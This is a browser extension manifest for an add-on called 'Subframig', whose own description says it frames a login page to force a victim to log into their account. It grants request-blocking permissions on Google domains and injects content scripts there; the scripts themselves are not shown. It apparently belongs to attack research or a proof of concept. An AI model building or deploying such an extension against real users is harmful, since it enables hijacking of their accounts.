{

  "manifest_version": 2,
  "name": "Subframig",
  "version": "0.0.1",
  "description": "Frames login page so as to force the victim to log into their account",
  "background": {
      "scripts": ["background.js"]
  },
  "permissions": ["webRequestBlocking", "webRequest", "https://*.google.com/*"],
  "content_scripts": [
    {
        "matches": ["https://*.google.com/*"],
        "exclude_globs": ["https://account.google.com/*", "https://www.google.com/*"],
        "js": ["contentscript.js"]
    }
  ],
  "browser_specific_settings": {
      "gecko": {
        "id": "test@example.com",
        "strict_min_version": "57.0"
      }
  }
}
